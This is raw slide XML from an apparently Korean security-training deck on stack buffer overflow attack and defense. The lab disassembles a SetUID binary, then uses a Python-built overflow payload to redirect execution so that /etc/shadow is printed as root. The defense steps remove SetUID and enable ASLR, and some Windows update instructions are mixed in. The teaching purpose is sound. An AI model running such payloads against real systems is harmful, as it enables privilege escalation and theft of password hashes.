              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함을 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/sec/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일을 실행하여 힌트 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./bof64 AAAA</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 bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수의 시작 주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>취약점 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>복귀 주소를 조작하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -M intel -d bof64 | more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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수 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ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>버퍼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>의 시작 주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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main </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>foo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>main </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/Environ/WindowUpdate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>윈도우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 윈도우 시작버튼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>톱니바퀴 아이콘 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭</a:t>
            </a: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b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="AppleSDGothicNeo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>업데이트 및 보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>을 클릭한다</a:t>
            </a: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최신버전이 아니라면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운로드 및 설치 버튼 클릭 및 업데이트 진행</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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>업데이트 버전의 다운로드가 완료되었다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./bof64 $(python -c 'print "A"*24+"\x35\x06\x40"‘)</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 bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수의 시작 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>인텔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>복귀 주소에 역으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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/etc/shadow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root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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foo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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>번지</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즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, bar </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>내용을 파일에 출력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt; 1.txt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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 파일명을 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Buffer Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>대응</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/etc/shadow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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> -w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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>va_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>space=2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20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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) /sec/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l bof64</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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정 해제 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> us- /sec/bof64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l bof64</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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>va_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>bof64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/etc/shadow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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>ASLR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
